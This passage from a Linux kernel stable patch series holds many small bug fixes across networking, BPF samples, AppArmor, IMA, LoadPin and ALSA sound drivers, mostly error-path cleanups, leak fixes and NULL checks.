++	table[SCTP_RTO_MAX_IDX].extra1 = &net->sctp.rto_min;
++	table[SCTP_PF_RETRANS_IDX].extra2 = &net->sctp.ps_retrans;
++	table[SCTP_PS_RETRANS_IDX].extra1 = &net->sctp.pf_retrans;
++
+ 	net->sctp.sysctl_header = register_net_sysctl(net, "net/sctp", table);
+ 	if (net->sctp.sysctl_header == NULL) {
+ 		kfree(table);
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 993acf38af870..0b0b9f1eed469 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -1442,7 +1442,7 @@ static int rpc_sockname(struct net *net, struct sockaddr *sap, size_t salen,
+ 		break;
+ 	default:
+ 		err = -EAFNOSUPPORT;
+-		goto out;
++		goto out_release;
+ 	}
+ 	if (err < 0) {
+ 		dprintk("RPC:       can't bind UDP socket (%d)\n", err);
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 44b87e4274b42..b098fde373abf 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -831,7 +831,7 @@ struct rpcrdma_req *rpcrdma_req_create(struct rpcrdma_xprt *r_xprt,
+ 	return req;
+ 
+ out3:
+-	kfree(req->rl_sendbuf);
++	rpcrdma_regbuf_free(req->rl_sendbuf);
+ out2:
+ 	kfree(req);
+ out1:
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 264cf367e2656..9ed9786341259 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -792,7 +792,7 @@ static int bpf_exec_tx_verdict(struct sk_msg *msg, struct sock *sk,
+ 	struct sk_psock *psock;
+ 	struct sock *sk_redir;
+ 	struct tls_rec *rec;
+-	bool enospc, policy;
++	bool enospc, policy, redir_ingress;
+ 	int err = 0, send;
+ 	u32 delta = 0;
+ 
+@@ -837,6 +837,7 @@ more_data:
+ 		}
+ 		break;
+ 	case __SK_REDIRECT:
++		redir_ingress = psock->redir_ingress;
+ 		sk_redir = psock->sk_redir;
+ 		memcpy(&msg_redir, msg, sizeof(*msg));
+ 		if (msg->apply_bytes < send)
+@@ -846,7 +847,8 @@ more_data:
+ 		sk_msg_return_zero(sk, msg, send);
+ 		msg->sg.size -= send;
+ 		release_sock(sk);
+-		err = tcp_bpf_sendmsg_redir(sk_redir, &msg_redir, send, flags);
++		err = tcp_bpf_sendmsg_redir(sk_redir, redir_ingress,
++					    &msg_redir, send, flags);
+ 		lock_sock(sk);
+ 		if (err < 0) {
+ 			*copied -= sk_msg_free_nocharge(sk, &msg_redir);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index b3545fc680979..f0c2293f1d3b8 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1999,13 +1999,20 @@ restart_locked:
+ 			unix_state_lock(sk);
+ 
+ 		err = 0;
+-		if (unix_peer(sk) == other) {
++		if (sk->sk_type == SOCK_SEQPACKET) {
++			/* We are here only when racing with unix_release_sock()
++			 * is clearing @other. Never change state to TCP_CLOSE
++			 * unlike SOCK_DGRAM wants.
++			 */
++			unix_state_unlock(sk);
++			err = -EPIPE;
++		} else if (unix_peer(sk) == other) {
+ 			unix_peer(sk) = NULL;
+ 			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
+ 
++			sk->sk_state = TCP_CLOSE;
+ 			unix_state_unlock(sk);
+ 
+-			sk->sk_state = TCP_CLOSE;
+ 			unix_dgram_disconnected(sk, other);
+ 			sock_put(other);
+ 			err = -ECONNREFUSED;
+@@ -3738,6 +3745,7 @@ static int __init af_unix_init(void)
+ 	rc = proto_register(&unix_stream_proto, 1);
+ 	if (rc != 0) {
+ 		pr_crit("%s: Cannot create unix_sock SLAB cache!\n", __func__);
++		proto_unregister(&unix_dgram_proto);
+ 		goto out;
+ 	}
+ 
+diff --git a/net/vmw_vsock/vmci_transport.c b/net/vmw_vsock/vmci_transport.c
+index 842c94286d316..36eb16a40745d 100644
+--- a/net/vmw_vsock/vmci_transport.c
++++ b/net/vmw_vsock/vmci_transport.c
+@@ -1711,7 +1711,11 @@ static int vmci_transport_dgram_enqueue(
+ 	if (!dg)
+ 		return -ENOMEM;
+ 
+-	memcpy_from_msg(VMCI_DG_PAYLOAD(dg), msg, len);
++	err = memcpy_from_msg(VMCI_DG_PAYLOAD(dg), msg, len);
++	if (err) {
++		kfree(dg);
++		return err;
++	}
+ 
+ 	dg->dst = vmci_make_handle(remote_addr->svm_cid,
+ 				   remote_addr->svm_port);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 597c522365146..d2321c6833985 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3868,6 +3868,9 @@ static int nl80211_send_iface(struct sk_buff *msg, u32 portid, u32 seq, int flag
+ 			struct cfg80211_chan_def chandef = {};
+ 			int ret;
+ 
++			if (!link)
++				goto nla_put_failure;
++
+ 			if (nla_put_u8(msg, NL80211_ATTR_MLO_LINK_ID, link_id))
+ 				goto nla_put_failure;
+ 			if (nla_put(msg, NL80211_ATTR_MAC, ETH_ALEN,
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index c3d950d294329..4f3f31244e8ba 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -4311,8 +4311,10 @@ static int __init regulatory_init_db(void)
+ 		return -EINVAL;
+ 
+ 	err = load_builtin_regdb_keys();
+-	if (err)
++	if (err) {
++		platform_device_unregister(reg_pdev);
+ 		return err;
++	}
+ 
+ 	/* We always try to get an update for the static regdomain */
+ 	err = regulatory_hint_core(cfg80211_world_regdom->alpha2);
+diff --git a/samples/bpf/xdp1_user.c b/samples/bpf/xdp1_user.c
+index ac370e638fa3d..281dc964de8da 100644
+--- a/samples/bpf/xdp1_user.c
++++ b/samples/bpf/xdp1_user.c
+@@ -51,7 +51,7 @@ static void poll_stats(int map_fd, int interval)
+ 
+ 		sleep(interval);
+ 
+-		while (bpf_map_get_next_key(map_fd, &key, &key) != -1) {
++		while (bpf_map_get_next_key(map_fd, &key, &key) == 0) {
+ 			__u64 sum = 0;
+ 
+ 			assert(bpf_map_lookup_elem(map_fd, &key, values) == 0);
+diff --git a/samples/bpf/xdp2_kern.c b/samples/bpf/xdp2_kern.c
+index 3332ba6bb95fb..67804ecf7ce37 100644
+--- a/samples/bpf/xdp2_kern.c
++++ b/samples/bpf/xdp2_kern.c
+@@ -112,6 +112,10 @@ int xdp_prog1(struct xdp_md *ctx)
+ 
+ 	if (ipproto == IPPROTO_UDP) {
+ 		swap_src_dst_mac(data);
++
++		if (bpf_xdp_store_bytes(ctx, 0, pkt, sizeof(pkt)))
++			return rc;
++
+ 		rc = XDP_TX;
+ 	}
+ 
+diff --git a/samples/vfio-mdev/mdpy-fb.c b/samples/vfio-mdev/mdpy-fb.c
+index 9ec93d90e8a5a..4eb7aa11cfbb2 100644
+--- a/samples/vfio-mdev/mdpy-fb.c
++++ b/samples/vfio-mdev/mdpy-fb.c
+@@ -109,7 +109,7 @@ static int mdpy_fb_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_request_regions(pdev, "mdpy-fb");
+ 	if (ret < 0)
+-		return ret;
++		goto err_disable_dev;
+ 
+ 	pci_read_config_dword(pdev, MDPY_FORMAT_OFFSET, &format);
+ 	pci_read_config_dword(pdev, MDPY_WIDTH_OFFSET,	&width);
+@@ -191,6 +191,9 @@ err_release_fb:
+ err_release_regions:
+ 	pci_release_regions(pdev);
+ 
++err_disable_dev:
++	pci_disable_device(pdev);
++
+ 	return ret;
+ }
+ 
+@@ -199,7 +202,10 @@ static void mdpy_fb_remove(struct pci_dev *pdev)
+ 	struct fb_info *info = pci_get_drvdata(pdev);
+ 
+ 	unregister_framebuffer(info);
++	iounmap(info->screen_base);
+ 	framebuffer_release(info);
++	pci_release_regions(pdev);
++	pci_disable_device(pdev);
+ }
+ 
+ static struct pci_device_id mdpy_fb_pci_table[] = {
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index d766b7d0ffd13..53baa95cb644f 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -257,6 +257,9 @@ config INIT_ON_FREE_DEFAULT_ON
+ 
+ config CC_HAS_ZERO_CALL_USED_REGS
+ 	def_bool $(cc-option,-fzero-call-used-regs=used-gpr)
++	# https://github.com/ClangBuiltLinux/linux/issues/1766
++	# https://github.com/llvm/llvm-project/issues/59242
++	depends on !CC_IS_CLANG || CLANG_VERSION > 150006
+ 
+ config ZERO_CALL_USED_REGS
+ 	bool "Enable register zeroing on function exit"
+diff --git a/security/apparmor/apparmorfs.c b/security/apparmor/apparmorfs.c
+index d066ccc219e2d..7160e7aa58b94 100644
+--- a/security/apparmor/apparmorfs.c
++++ b/security/apparmor/apparmorfs.c
+@@ -868,8 +868,10 @@ static struct multi_transaction *multi_transaction_new(struct file *file,
+ 	if (!t)
+ 		return ERR_PTR(-ENOMEM);
+ 	kref_init(&t->count);
+-	if (copy_from_user(t->data, buf, size))
++	if (copy_from_user(t->data, buf, size)) {
++		put_multi_transaction(t);
+ 		return ERR_PTR(-EFAULT);
++	}
+ 
+ 	return t;
+ }
+diff --git a/security/apparmor/label.c b/security/apparmor/label.c
+index 0f36ee9074381..a67c5897ee254 100644
+--- a/security/apparmor/label.c
++++ b/security/apparmor/label.c
+@@ -197,15 +197,18 @@ static bool vec_is_stale(struct aa_profile **vec, int n)
+ 	return false;
+ }
+ 
+-static long union_vec_flags(struct aa_profile **vec, int n, long mask)
++static long accum_vec_flags(struct aa_profile **vec, int n)
+ {
+-	long u = 0;
++	long u = FLAG_UNCONFINED;
+ 	int i;
+ 
+ 	AA_BUG(!vec);
+ 
+ 	for (i = 0; i < n; i++) {
+-		u |= vec[i]->label.flags & mask;
++		u |= vec[i]->label.flags & (FLAG_DEBUG1 | FLAG_DEBUG2 |
++					    FLAG_STALE);
++		if (!(u & vec[i]->label.flags & FLAG_UNCONFINED))
++			u &= ~FLAG_UNCONFINED;
+ 	}
+ 
+ 	return u;
+@@ -1097,8 +1100,7 @@ static struct aa_label *label_merge_insert(struct aa_label *new,
+ 		else if (k == b->size)
+ 			return aa_get_label(b);
+ 	}
+-	new->flags |= union_vec_flags(new->vec, new->size, FLAG_UNCONFINED |
+-					      FLAG_DEBUG1 | FLAG_DEBUG2);
++	new->flags |= accum_vec_flags(new->vec, new->size);
+ 	ls = labels_set(new);
+ 	write_lock_irqsave(&ls->lock, flags);
+ 	label = __label_insert(labels_set(new), new, false);
+diff --git a/security/apparmor/lsm.c b/security/apparmor/lsm.c
+index f56070270c69d..1e2f40db15c58 100644
+--- a/security/apparmor/lsm.c
++++ b/security/apparmor/lsm.c
+@@ -1194,10 +1194,10 @@ static int apparmor_inet_conn_request(const struct sock *sk, struct sk_buff *skb
+ #endif
+ 
+ /*
+- * The cred blob is a pointer to, not an instance of, an aa_task_ctx.
++ * The cred blob is a pointer to, not an instance of, an aa_label.
+  */
+ struct lsm_blob_sizes apparmor_blob_sizes __lsm_ro_after_init = {
+-	.lbs_cred = sizeof(struct aa_task_ctx *),
++	.lbs_cred = sizeof(struct aa_label *),
+ 	.lbs_file = sizeof(struct aa_file_ctx),
+ 	.lbs_task = sizeof(struct aa_task_ctx),
+ };
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index 499c0209b6a46..fbdfcef91c616 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -1170,7 +1170,7 @@ ssize_t aa_remove_profiles(struct aa_ns *policy_ns, struct aa_label *subj,
+ 
+ 	if (!name) {
+ 		/* remove namespace - can only happen if fqname[0] == ':' */
+-		mutex_lock_nested(&ns->parent->lock, ns->level);
++		mutex_lock_nested(&ns->parent->lock, ns->parent->level);
+ 		__aa_bump_ns_revision(ns);
+ 		__aa_remove_ns(ns);
+ 		mutex_unlock(&ns->parent->lock);
+diff --git a/security/apparmor/policy_ns.c b/security/apparmor/policy_ns.c
+index 43beaad083feb..78700d94b4533 100644
+--- a/security/apparmor/policy_ns.c
++++ b/security/apparmor/policy_ns.c
+@@ -134,7 +134,7 @@ static struct aa_ns *alloc_ns(const char *prefix, const char *name)
+ 	return ns;
+ 
+ fail_unconfined:
+-	kfree_sensitive(ns->base.hname);
++	aa_policy_destroy(&ns->base);
+ fail_ns:
+ 	kfree_sensitive(ns);
+ 	return NULL;
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 55d31bac4f35b..9d26bbb901338 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -972,7 +972,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	 * if not specified use previous version
+ 	 * Mask off everything that is not kernel abi version
+ 	 */
+-	if (VERSION_LT(e->version, v5) || VERSION_GT(e->version, v7)) {
++	if (VERSION_LT(e->version, v5) || VERSION_GT(e->version, v8)) {
+ 		audit_iface(NULL, NULL, NULL, "unsupported interface version",
+ 			    e, error);
+ 		return error;
+diff --git a/security/integrity/digsig.c b/security/integrity/digsig.c
+index 8a82a6c7f48a4..f2193c531f4a4 100644
+--- a/security/integrity/digsig.c
++++ b/security/integrity/digsig.c
+@@ -126,6 +126,7 @@ int __init integrity_init_keyring(const unsigned int id)
+ {
+ 	struct key_restriction *restriction;
+ 	key_perm_t perm;
++	int ret;
+ 
+ 	perm = (KEY_POS_ALL & ~KEY_POS_SETATTR) | KEY_USR_VIEW
+ 		| KEY_USR_READ | KEY_USR_SEARCH;
+@@ -154,7 +155,10 @@ int __init integrity_init_keyring(const unsigned int id)
+ 		perm |= KEY_USR_WRITE;
+ 
+ out:
+-	return __integrity_init_keyring(id, perm, restriction);
++	ret = __integrity_init_keyring(id, perm, restriction);
++	if (ret)
++		kfree(restriction);
++	return ret;
+ }
+ 
+ static int __init integrity_add_key(const unsigned int id, const void *data,
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index a8802b8da946b..2edff7f58c25c 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -398,12 +398,6 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ 		nentry->lsm[i].type = entry->lsm[i].type;
+ 		nentry->lsm[i].args_p = entry->lsm[i].args_p;
+-		/*
+-		 * Remove the reference from entry so that the associated
+-		 * memory will not be freed during a later call to
+-		 * ima_lsm_free_rule(entry).
+-		 */
+-		entry->lsm[i].args_p = NULL;
+ 
+ 		ima_filter_rule_init(nentry->lsm[i].type, Audit_equal,
+ 				     nentry->lsm[i].args_p,
+@@ -417,6 +411,7 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ {
++	int i;
+ 	struct ima_rule_entry *nentry;
+ 
+ 	nentry = ima_lsm_copy_rule(entry);
+@@ -431,7 +426,8 @@ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ 	 * references and the entry itself. All other memory references will now
+ 	 * be owned by nentry.
+ 	 */
+-	ima_lsm_free_rule(entry);
++	for (i = 0; i < MAX_LSM_RULES; i++)
++		ima_filter_rule_free(entry->lsm[i].rule);
+ 	kfree(entry);
+ 
+ 	return 0;
+@@ -549,6 +545,9 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 			    const char *func_data)
+ {
+ 	int i;
++	bool result = false;
++	struct ima_rule_entry *lsm_rule = rule;
++	bool rule_reinitialized = false;
+ 
+ 	if ((rule->flags & IMA_FUNC) &&
+ 	    (rule->func != func && func != POST_SETATTR))
+@@ -610,35 +609,55 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 		int rc = 0;
+ 		u32 osid;
+ 
+-		if (!rule->lsm[i].rule) {
+-			if (!rule->lsm[i].args_p)
++		if (!lsm_rule->lsm[i].rule) {
++			if (!lsm_rule->lsm[i].args_p)
+ 				continue;
+ 			else
+ 				return false;
+ 		}
++
++retry:
+ 		switch (i) {
+ 		case LSM_OBJ_USER:
+ 		case LSM_OBJ_ROLE:
+ 		case LSM_OBJ_TYPE:
+ 			security_inode_getsecid(inode, &osid);
+-			rc = ima_filter_rule_match(osid, rule->lsm[i].type,
++			rc = ima_filter_rule_match(osid, lsm_rule->lsm[i].type,
+ 						   Audit_equal,
+-						   rule->lsm[i].rule);
++						   lsm_rule->lsm[i].rule);
+ 			break;
+ 		case LSM_SUBJ_USER:
+ 		case LSM_SUBJ_ROLE:
+ 		case LSM_SUBJ_TYPE:
+-			rc = ima_filter_rule_match(secid, rule->lsm[i].type,
++			rc = ima_filter_rule_match(secid, lsm_rule->lsm[i].type,
+ 						   Audit_equal,
+-						   rule->lsm[i].rule);
++						   lsm_rule->lsm[i].rule);
+ 			break;
+ 		default:
+ 			break;
+ 		}
+-		if (!rc)
+-			return false;
++
++		if (rc == -ESTALE && !rule_reinitialized) {
++			lsm_rule = ima_lsm_copy_rule(rule);
++			if (lsm_rule) {
++				rule_reinitialized = true;
++				goto retry;
++			}
++		}
++		if (!rc) {
++			result = false;
++			goto out;
++		}
+ 	}
+-	return true;
++	result = true;
++
++out:
++	if (rule_reinitialized) {
++		for (i = 0; i < MAX_LSM_RULES; i++)
++			ima_filter_rule_free(lsm_rule->lsm[i].rule);
++		kfree(lsm_rule);
++	}
++	return result;
+ }
+ 
+ /*
+diff --git a/security/integrity/ima/ima_template.c b/security/integrity/ima/ima_template.c
+index c25079faa2088..195ac18f09275 100644
+--- a/security/integrity/ima/ima_template.c
++++ b/security/integrity/ima/ima_template.c
+@@ -245,11 +245,11 @@ int template_desc_init_fields(const char *template_fmt,
+ 	}
+ 
+ 	if (fields && num_fields) {
+-		*fields = kmalloc_array(i, sizeof(*fields), GFP_KERNEL);
++		*fields = kmalloc_array(i, sizeof(**fields), GFP_KERNEL);
+ 		if (*fields == NULL)
+ 			return -ENOMEM;
+ 
+-		memcpy(*fields, found_fields, i * sizeof(*fields));
++		memcpy(*fields, found_fields, i * sizeof(**fields));
+ 		*num_fields = i;
+ 	}
+ 
+diff --git a/security/loadpin/loadpin.c b/security/loadpin/loadpin.c
+index de41621f4998e..110a5ab2b46bc 100644
+--- a/security/loadpin/loadpin.c
++++ b/security/loadpin/loadpin.c
+@@ -122,21 +122,11 @@ static void loadpin_sb_free_security(struct super_block *mnt_sb)
+ 	}
+ }
+ 
+-static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
+-			     bool contents)
++static int loadpin_check(struct file *file, enum kernel_read_file_id id)
+ {
+ 	struct super_block *load_root;
+ 	const char *origin = kernel_read_file_id_str(id);
+ 
+-	/*
+-	 * If we will not know that we'll be seeing the full contents
+-	 * then we cannot trust a load will be complete and unchanged
+-	 * off disk. Treat all contents=false hooks as if there were
+-	 * no associated file struct.
+-	 */
+-	if (!contents)
+-		file = NULL;
+-
+ 	/* If the file id is excluded, ignore the pinning. */
+ 	if ((unsigned int)id < ARRAY_SIZE(ignore_read_file_id) &&
+ 	    ignore_read_file_id[id]) {
+@@ -192,9 +182,25 @@ static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
+ 	return 0;
+ }
+ 
++static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
++			     bool contents)
++{
++	/*
++	 * LoadPin only cares about the _origin_ of a file, not its
++	 * contents, so we can ignore the "are full contents available"
++	 * argument here.
++	 */
++	return loadpin_check(file, id);
++}
++
+ static int loadpin_load_data(enum kernel_load_data_id id, bool contents)
+ {
+-	return loadpin_read_file(NULL, (enum kernel_read_file_id) id, contents);
++	/*
++	 * LoadPin only cares about the _origin_ of a file, not its
++	 * contents, so a NULL file is passed, and we can ignore the
++	 * state of "contents".
++	 */
++	return loadpin_check(NULL, (enum kernel_read_file_id) id);
+ }
+ 
+ static struct security_hook_list loadpin_hooks[] __lsm_ro_after_init = {
+diff --git a/sound/core/memalloc.c b/sound/core/memalloc.c
+index ba095558b6d16..7268304009ada 100644
+--- a/sound/core/memalloc.c
++++ b/sound/core/memalloc.c
+@@ -720,7 +720,6 @@ static const struct snd_malloc_ops snd_dma_sg_wc_ops = {
+ struct snd_dma_sg_fallback {
+ 	size_t count;
+ 	struct page **pages;
+-	dma_addr_t *addrs;
+ };
+ 
+ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+@@ -732,38 +731,49 @@ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+ 	for (i = 0; i < sgbuf->count && sgbuf->pages[i]; i++)
+ 		do_free_pages(page_address(sgbuf->pages[i]), PAGE_SIZE, wc);
+ 	kvfree(sgbuf->pages);
+-	kvfree(sgbuf->addrs);
+ 	kfree(sgbuf);
+ }
+ 
+ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ {
+ 	struct snd_dma_sg_fallback *sgbuf;
+-	struct page **pages;
+-	size_t i, count;
++	struct page **pagep, *curp;
++	size_t chunk, npages;
++	dma_addr_t addr;
+ 	void *p;
+ 	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+ 
+ 	sgbuf = kzalloc(sizeof(*sgbuf), GFP_KERNEL);
+ 	if (!sgbuf)
+ 		return NULL;
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kvcalloc(count, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		goto error;
+-	sgbuf->pages = pages;
+-	sgbuf->addrs = kvcalloc(count, sizeof(*sgbuf->addrs), GFP_KERNEL);
+-	if (!sgbuf->addrs)
++	size = PAGE_ALIGN(size);
++	sgbuf->count = size >> PAGE_SHIFT;
++	sgbuf->pages = kvcalloc(sgbuf->count, sizeof(*sgbuf->pages), GFP_KERNEL);
++	if (!sgbuf->pages)
+ 		goto error;
+ 
+-	for (i = 0; i < count; sgbuf->count++, i++) {
+-		p = do_alloc_pages(dmab->dev.dev, PAGE_SIZE, &sgbuf->addrs[i], wc);
+-		if (!p)
+-			goto error;
+-		sgbuf->pages[i] = virt_to_page(p);
++	pagep = sgbuf->pages;
++	chunk = size;
++	while (size > 0) {
++		chunk = min(size, chunk);
++		p = do_alloc_pages(dmab->dev.dev, chunk, &addr, wc);
++		if (!p) {
++			if (chunk <= PAGE_SIZE)
++				goto error;
++			chunk >>= 1;
++			chunk = PAGE_SIZE << get_order(chunk);
++			continue;
++		}
++
++		size -= chunk;
++		/* fill pages */
++		npages = chunk >> PAGE_SHIFT;
++		curp = virt_to_page(p);
++		while (npages--)
++			*pagep++ = curp++;
+ 	}
+ 
+-	p = vmap(pages, count, VM_MAP, PAGE_KERNEL);
++	p = vmap(sgbuf->pages, sgbuf->count, VM_MAP, PAGE_KERNEL);
+ 	if (!p)
+ 		goto error;
+ 	dmab->private_data = sgbuf;
+diff --git a/sound/core/pcm_native.c b/sound/core/pcm_native.c
+index 33769ca78cc8f..9238abbfb2d62 100644
+--- a/sound/core/pcm_native.c
++++ b/sound/core/pcm_native.c
+@@ -1432,8 +1432,10 @@ static int snd_pcm_do_start(struct snd_pcm_substream *substream,
+ static void snd_pcm_undo_start(struct snd_pcm_substream *substream,
+ 			       snd_pcm_state_t state)
+ {
+-	if (substream->runtime->trigger_master == substream)
++	if (substream->runtime->trigger_master == substream) {
+ 		substream->ops->trigger(substream, SNDRV_PCM_TRIGGER_STOP);
++		substream->runtime->stop_operating = true;
++	}
+ }
+ 
+ static void snd_pcm_post_start(struct snd_pcm_substream *substream,
+diff --git a/sound/drivers/mts64.c b/sound/drivers/mts64.c
+index d3bc9e8c407dc..f0d34cf70c3e0 100644
+--- a/sound/drivers/mts64.c
++++ b/sound/drivers/mts64.c
+@@ -815,6 +815,9 @@ static void snd_mts64_interrupt(void *private)
+ 	u8 status, data;
+ 	struct snd_rawmidi_substream *substream;
+ 
++	if (!mts)
++		return;
++
+ 	spin_lock(&mts->lock);
+ 	ret = mts64_read(mts->pardev->port);
+ 	data = ret & 0x00ff;
+diff --git a/sound/pci/asihpi/hpioctl.c b/sound/pci/asihpi/hpioctl.c
+index bb31b7fe867d6..477a5b4b50bcb 100644
+--- a/sound/pci/asihpi/hpioctl.c
++++ b/sound/pci/asihpi/hpioctl.c
+@@ -361,7 +361,7 @@ int asihpi_adapter_probe(struct pci_dev *pci_dev,
+ 		pci_dev->device, pci_dev->subsystem_vendor,
+ 		pci_dev->subsystem_device, pci_dev->devfn);
+ 
+-	if (pci_enable_device(pci_dev) < 0) {
++	if (pcim_enable_device(pci_dev) < 0) {
+ 		dev_err(&pci_dev->dev,
+ 			"pci_enable_device failed, disabling device\n");
+ 		return -EIO;
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index b4d1e658c5560..edd653ece70d7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -2886,7 +2886,8 @@ static unsigned int hda_call_codec_suspend(struct hda_codec *codec)
+ 	snd_hdac_enter_pm(&codec->core);
+ 	if (codec->patch_ops.suspend)
+ 		codec->patch_ops.suspend(codec);
+-	hda_cleanup_all_streams(codec);
++	if (!codec->no_stream_clean_at_suspend)
++		hda_cleanup_all_streams(codec);
+ 	state = hda_set_power_state(codec, AC_PWRST_D3);
+ 	update_power_acct(codec, true);
+ 	snd_hdac_leave_pm(&codec->core);
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 21edf7a619f07..8015e44712678 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1738,6 +1738,7 @@ static void silent_stream_enable(struct hda_codec *codec,
+ 
+ 	switch (spec->silent_stream_type) {
+ 	case SILENT_STREAM_KAE:
++		silent_stream_enable_i915(codec, per_pin);
+ 		silent_stream_set_kae(codec, per_pin, true);
+ 		break;
+ 	case SILENT_STREAM_I915:
+@@ -1975,6 +1976,7 @@ static int hdmi_add_cvt(struct hda_codec *codec, hda_nid_t cvt_nid)
+ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
++	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+@@ -2878,9 +2880,33 @@ static int i915_hsw_setup_stream(struct hda_codec *codec, hda_nid_t cvt_nid,
+ 				 hda_nid_t pin_nid, int dev_id, u32 stream_tag,
+ 				 int format)
+ {
++	struct hdmi_spec *spec = codec->spec;
++	int pin_idx = pin_id_to_pin_index(codec, pin_nid, dev_id);
++	struct hdmi_spec_per_pin *per_pin;
++	int res;
++
++	if (pin_idx < 0)
++		per_pin = NULL;
++	else
++		per_pin = get_pin(spec, pin_idx);
++
+ 	haswell_verify_D0(codec, cvt_nid, pin_nid);
+-	return hdmi_setup_stream(codec, cvt_nid, pin_nid, dev_id,
+-				 stream_tag, format);
++
++	if (spec->silent_stream_type == SILENT_STREAM_KAE && per_pin && per_pin->silent_stream) {
++		silent_stream_set_kae(codec, per_pin, false);
++		/* wait for pending transfers in codec to clear */
++		usleep_range(100, 200);
++	}
++
++	res = hdmi_setup_stream(codec, cvt_nid, pin_nid, dev_id,
++				stream_tag, format);
++
++	if (spec->silent_stream_type == SILENT_STREAM_KAE && per_pin && per_pin->silent_stream) {
++		usleep_range(100, 200);
++		silent_stream_set_kae(codec, per_pin, true);
++	}
++
++	return res;
+ }
+ 
+ /* pin_cvt_fixup ops override for HSW+ and VLV+ */
+@@ -2900,6 +2926,88 @@ static void i915_pin_cvt_fixup(struct hda_codec *codec,
+ 	}
+ }
+ 
++#ifdef CONFIG_PM
++static int i915_adlp_hdmi_suspend(struct hda_codec *codec)
++{
++	struct hdmi_spec *spec = codec->spec;
++	bool silent_streams = false;
++	int pin_idx, res;
++
++	res = generic_hdmi_suspend(codec);
++
++	for (pin_idx = 0; pin_idx < spec->num_pins; pin_idx++) {
++		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
++
++		if (per_pin->silent_stream) {
++			silent_streams = true;
++			break;
++		}
++	}
++
++	if (silent_streams && spec->silent_stream_type == SILENT_STREAM_KAE) {
++		/*
++		 * stream-id should remain programmed when codec goes
++		 * to runtime suspend
++		 */
++		codec->no_stream_clean_at_suspend = 1;
++
++		/*
++		 * the system might go to S3, in which case keep-alive
++		 * must be reprogrammed upon resume
++		 */
++		codec->forced_resume = 1;
++
++		codec_dbg(codec, "HDMI: KAE active at suspend\n");
++	} else {
++		codec->no_stream_clean_at_suspend = 0;
++		codec->forced_resume = 0;
++	}
++
++	return res;
++}
++
++static int i915_adlp_hdmi_resume(struct hda_codec *codec)
++{
++	struct hdmi_spec *spec = codec->spec;
++	int pin_idx, res;
++
++	res = generic_hdmi_resume(codec);
++
++	/* KAE not programmed at suspend, nothing to do here */
++	if (!codec->no_stream_clean_at_suspend)
++		return res;
++
++	for (pin_idx = 0; pin_idx < spec->num_pins; pin_idx++) {
++		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
++
++		/*
++		 * If system was in suspend with monitor connected,
++		 * the codec setting may have been lost. Re-enable
++		 * keep-alive.
++		 */
++		if (per_pin->silent_stream) {
++			unsigned int param;
++
++			param = snd_hda_codec_read(codec, per_pin->cvt_nid, 0,
++						   AC_VERB_GET_CONV, 0);
++			if (!param) {
++				codec_dbg(codec, "HDMI: KAE: restore stream id\n");
